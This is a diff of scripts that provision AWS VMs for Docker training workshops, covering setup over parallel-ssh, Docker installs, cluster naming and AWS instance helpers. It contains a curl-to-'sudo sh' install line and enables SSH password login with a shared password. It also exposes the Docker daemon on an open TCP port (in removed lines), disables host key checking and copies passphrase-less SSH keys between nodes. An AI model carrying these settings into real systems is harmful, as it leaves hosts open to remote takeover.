print("Generated ips.html")

try:
    import pdfkit
    with open("ips.html") as f:
        pdfkit.from_file(f, "ips.pdf", options={
            "page-size": SETTINGS["paper_size"],
            "margin-top": SETTINGS["paper_margin"],
            "margin-bottom": SETTINGS["paper_margin"],
            "margin-left": SETTINGS["paper_margin"],
            "margin-right": SETTINGS["paper_margin"],
        })
    print("Generated ips.pdf")
except ImportError:
    print("WARNING: could not import pdfkit; did not generate ips.pdf")
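The script only relies on a handful of settings keys (clustersize, cards_template, paper_size, paper_margin). A minimal settings file could be produced like this (a sketch; the values are hypothetical, and cards.html must exist under templates/):

# Hypothetical minimal settings file for ips-txt-to-html.py:
cat > settings.yaml <<EOF
clustersize: 3
cards_template: cards.html
paper_size: A4
paper_margin: 5mm
EOF
lib/ips-txt-to-html.py settings.yaml   # reads ips.txt, writes ips.html (and ips.pdf if pdfkit is available)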
@@ -1,8 +1,3 @@
pssh -I tee /tmp/settings.yaml < $SETTINGS

pssh sudo easy_install pyyaml

pssh -I tee /tmp/postprep.py <<EOF
#!/usr/bin/env python
import os
import platform
@@ -16,9 +11,10 @@ import yaml
config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
SWARM_VERSION = config["swarm_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]

#################################
@@ -37,18 +33,21 @@ def system(cmd):
    t1 = time.time()
    f.write(bold("--- RUNNING [step {}] ---> {}...".format(STEP, cmd)))
    retcode = os.system(cmd)
    if retcode:
        retcode = bold(retcode)
    t2 = time.time()
    td = str(t2-t1)[:5]
    f.write("[{}] in {}s\n".format(retcode, td))
    f.write(bold("[{}] in {}s\n".format(retcode, td)))
    STEP += 1
    with open("/home/ubuntu/.bash_history", "a") as f:
        f.write("{}\n".format(cmd))
    if retcode != 0:
        msg = "The following command failed with exit code {}:\n".format(retcode)
        msg += cmd
        raise Exception(msg)


# On EC2, the ephemeral disk might be mounted on /mnt.
# If /mnt is a mountpoint, place the Docker workspace on it.
system("if mountpoint -q /mnt; then sudo mkdir /mnt/docker && sudo ln -s /mnt/docker /var/lib/docker; fi")
system("if mountpoint -q /mnt; then sudo mkdir -p /mnt/docker && sudo ln -sfn /mnt/docker /var/lib/docker; fi")

# Put our public IP in /tmp/ipv4
# ipv4_retrieval_endpoint = "http://169.254.169.254/latest/meta-data/public-ipv4"
@@ -57,39 +56,13 @@ system("curl --silent {} > /tmp/ipv4".format(ipv4_retrieval_endpoint))

ipv4 = open("/tmp/ipv4").read()

# Add a "docker" user with password "training"
system("sudo useradd -d /home/docker -m -s /bin/bash docker")
system("echo docker:training | sudo chpasswd")

# Helper for Docker prompt.
system("""sudo tee /usr/local/bin/docker-prompt <<SQRL
#!/bin/sh
case "\\\$DOCKER_HOST" in
*:3376)
echo swarm
;;
*:2376)
echo \\\$DOCKER_MACHINE_NAME
;;
*:2375)
echo \\\$DOCKER_MACHINE_NAME
;;
*:55555)
echo \\\$DOCKER_MACHINE_NAME
;;
"")
echo local
;;
*)
echo unknown
;;
esac
SQRL""")
system("sudo chmod +x /usr/local/bin/docker-prompt")
# Add a "docker" user with a password coming from the settings
system("id docker || sudo useradd -d /home/docker -m -s /bin/bash docker")
system("echo docker:{} | sudo chpasswd".format(DOCKER_USER_PASSWORD))

# Fancy prompt courtesy of @soulshake.
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export PS1='\e[1m\e[31m[\h] \e[32m(\\\$(docker-prompt)) \e[34m\u@{}\e[35m \w\e[0m\n$ '
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
SQRL""".format(ipv4))

# Custom .vimrc
@@ -111,51 +84,37 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e

system("sudo service ssh restart")
system("sudo apt-get -q update")
system("sudo apt-get -qy install git jq python-pip")

# Increase the size of the conntrack table so we don't blow it up when going crazy with HTTP load testing
system("echo 1000000 | sudo tee /proc/sys/net/nf_conntrack_max")
system("sudo apt-get -qy install git jq")

#######################
### DOCKER INSTALLS ###
#######################

# This will install the latest Docker.
system("curl --silent https://{}/ | grep -v '( set -x; sleep 20 )' | sudo sh".format(ENGINE_VERSION))

# Make sure that the daemon listens on 55555 (for the orchestration workshop).
# To test, run: export DOCKER_HOST=tcp://localhost:55555 ; docker ps
# or run "curl localhost:55555" (it should return "404 not found"; "connection refused" is a bad sign).
system("sudo sed -i 's,-H fd://$,-H fd:// -H tcp://0.0.0.0:55555,' /lib/systemd/system/docker.service")
system("sudo systemctl daemon-reload")

# There seems to be a bug in the systemd scripts, so work around it.
# See https://github.com/docker/docker/issues/18444
# If Docker is already running, we need to do a restart.
system("curl --silent localhost:55555 || sudo systemctl restart docker ") # does this work? if not, the next line should cover it
system("sudo systemctl start docker || true")
#system("curl --silent https://{}/ | grep -v '( set -x; sleep 20 )' | sudo sh".format(ENGINE_VERSION))
system("sudo apt-get -qy install apt-transport-https ca-certificates curl software-properties-common")
system("curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -")
system("sudo add-apt-repository 'deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial {}'".format(ENGINE_VERSION))
system("sudo apt-get -q update")
system("sudo apt-get -qy install docker-ce")

### Install docker-compose
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-compose")
system("docker-compose version")

### Install docker-machine
system("sudo curl -sSL -o /usr/local/bin/docker-machine https://github.com/docker/machine/releases/download/v{}/docker-machine-{}-{}".format(MACHINE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-machine")
system("docker-machine version")

system("sudo apt-get remove -y --purge dnsmasq-base")
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh")
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh tree")

### Wait for Docker to be up.
### (If we don't do this, Docker will not be responsive during the next step.)
system("while ! sudo -u docker docker version ; do sleep 2; done")

### Install Swarm
system("docker pull swarm:{}".format(SWARM_VERSION))
system("docker tag -f swarm:{} swarm".format(SWARM_VERSION))


### BEGIN CLUSTERING ###

addresses = list(l.strip() for l in sys.stdin)
@@ -163,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses

def makenames(addrs):
    return [ "node%s"%(i+1) for i in range(len(addrs)) ]
    return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]

while addresses:
    cluster = addresses[:CLUSTER_SIZE]
@@ -177,33 +136,22 @@ while addresses:
    print(cluster)

    mynode = cluster.index(ipv4) + 1
    system("echo 'node{}' | sudo -u docker tee /tmp/node".format(mynode))
    system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
    system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
    system("sudo -u docker mkdir -p /home/docker/.ssh")
    system("sudo -u docker touch /home/docker/.ssh/authorized_keys")

    # Create a convenience file to easily check if we're the first node
    if ipv4 == cluster[0]:
        # If I'm node1 and don't have a private key, generate one (with an empty passphrase)
        system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
        # On the first node, if we don't have a private key, generate one (with an empty passphrase)
        system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
    else:
        system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
    # Record the IPv4 address and name of the first node
    system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
    system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))

FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
system("echo {}".format(duration))

EOF

IPS_FILE=ips.txt
if [ ! -s $IPS_FILE ]; then
    echo "ips.txt not found."
    exit 1
fi

pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" < $IPS_FILE

# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh | sudo -u docker tar -C /home/docker -xf-"

# If 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, append the public key there
pssh "grep docker@ /home/docker/.ssh/authorized_keys \
    || cat /home/docker/.ssh/id_rsa.pub \
    | sudo -u docker tee -a /home/docker/.ssh/authorized_keys"

prepare-vms/lib/pssh.sh (new file)
@@ -0,0 +1,28 @@
# This file can be sourced in order to directly run commands on
# a group of VMs whose IPs are listed in tags/$TAG/ips.txt
# (relative to the directory in which the command is run).

pssh() {
    if [ -z "$TAG" ]; then
        >/dev/stderr echo "Variable \$TAG is not set."
        return
    fi

    HOSTFILE="tags/$TAG/ips.txt"

    [ -f $HOSTFILE ] || {
        >/dev/stderr echo "Hostfile $HOSTFILE not found."
        return
    }

    echo "[parallel-ssh] $@"
    export PSSH=$(which pssh || which parallel-ssh)

    $PSSH -h $HOSTFILE -l ubuntu \
        --par 100 \
        -O LogLevel=ERROR \
        -O UserKnownHostsFile=/dev/null \
        -O StrictHostKeyChecking=no \
        -O ForwardAgent=yes \
        "$@"
}
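A quick usage sketch (the tag below is hypothetical): source the file, set $TAG, and every argument is broadcast to all VMs listed in the corresponding ips.txt.

# Hypothetical session:
source lib/pssh.sh
export TAG=2019-06-12-09-41-jerome
pssh hostname        # runs "hostname" on every VM listed in tags/$TAG/ips.txt
pssh sudo docker ps  # arbitrary commands work the same way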
prepare-vms/lib/wkhtmltopdf (new executable file)
@@ -0,0 +1,4 @@
#!/bin/sh
# Headless wrapper: make sure an X server (Xvfb) is running, then invoke the real binary.
pidof Xvfb || Xvfb -terminate &
export DISPLAY=:0
exec wkhtmltopdf.real "$@"
@@ -1,70 +0,0 @@
(deleted file: a 70-line SVG illustration, 6.5 KiB before deletion; markup not reproduced here)
(deleted file: a binary image, 65 KiB before deletion; not shown)
@@ -1,116 +0,0 @@
#!/bin/bash

source scripts/cli.sh

aws_display_tags() {
    # Print all "Name" tags in our region, with their instance count
    echo "[#] [Status] [Tag]" | awk '{ printf " %7s %8s %10s \n", $1, $2, $3}'
    aws ec2 describe-instances --filter "Name=tag:Name,Values=[*]" \
        --query "Reservations[*].Instances[*].[{Tags:Tags[0].Value,State:State.Name}]" \
        | awk '{ printf " %-13s %-10s %-1s\n", $1, $2, $3}' \
        | uniq -c \
        | sort -k 3
}

aws_display_tokens() {
    # Print all tokens in our region, with their instance count
    echo "[#] [Token] [Tag]" | awk '{ printf " %7s %12s %30s\n", $1, $2, $3}'
    # --query 'Volumes[*].{ID:VolumeId,AZ:AvailabilityZone,Size:Size}'
    aws ec2 describe-instances --output text \
        --query 'Reservations[*].Instances[*].{ClientToken:ClientToken,Tags:Tags[0].Value}' \
        | awk '{ printf " %7s %12s %50s\n", $1, $2, $3}' \
        | sort \
        | uniq -c \
        | sort -k 3
}

aws_get_tokens() {
    aws ec2 describe-instances --output text \
        --query 'Reservations[*].Instances[*].[ClientToken]' \
        | sort -u
}

aws_display_instance_statuses_by_tag() {
    TAG=$1
    need_tag $TAG

    IDS=$(aws ec2 describe-instances \
        --filters "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')

    aws ec2 describe-instance-status \
        --instance-ids $IDS \
        --query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
        --output table
}

aws_display_instances_by_tag() {
    TAG=$1
    need_tag $TAG
    result=$(aws ec2 describe-instances --output table \
        --filter "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].[ \
            InstanceId, \
            State.Name, \
            Tags[0].Value, \
            PublicIpAddress, \
            InstanceType \
            ]"
    )
    if [[ -z $result ]]; then
        echo "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
    else
        echo "ID State Tags IP Type" \
            | awk '{ printf "%9s %12s %15s %20s %14s \n", $1, $2, $3, $4, $5}' # column -t -c 70
        echo "$result"
    fi
}

aws_get_instance_ids_by_client_token() {
    TOKEN=$1
    need_tag $TOKEN
    aws ec2 describe-instances --filters "Name=client-token,Values=$TOKEN" \
        | grep ^INSTANCE \
        | awk '{print $8}'
}

aws_get_instance_ids_by_tag() {
    TAG=$1
    need_tag $TAG
    aws ec2 describe-instances --filters "Name=tag:Name,Values=$TAG" \
        | grep ^INSTANCE \
        | awk '{print $8}'
}

aws_get_instance_ips_by_tag() {
    TAG=$1
    need_tag $TAG
    aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
        --output text \
        --query "Reservations[*].Instances[*].PublicIpAddress" \
        | tr "\t" "\n" \
        | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}

aws_kill_instances_by_tag() {
    TAG=$1
    need_tag $TAG
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    if [ -z "$IDS" ]; then
        die "Invalid tag."
    fi

    echo "Deleting instances with tag $TAG"

    aws ec2 terminate-instances --instance-ids $IDS \
        | grep ^TERMINATINGINSTANCES
}

aws_tag_instances() {
    OLD_TAG_OR_TOKEN=$1
    NEW_TAG=$2
    IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
    IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
Some files were not shown because too many files have changed in this diff.